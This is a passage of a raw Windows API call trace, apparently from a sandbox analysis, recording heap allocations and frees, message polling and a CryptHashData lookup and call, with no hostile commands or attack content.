(HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0136.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0136.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0136.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0136.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0136.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0136.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e08 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0136.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0136.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0136.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e48 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0136.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0136.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.924] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0136.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0136.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0136.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0136.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0136.927] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0136.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0136.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50b00 [0136.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0136.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0136.929] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0136.929] CryptHashData (hHash=0xa87250, pbData=0x2e54e38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0136.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, 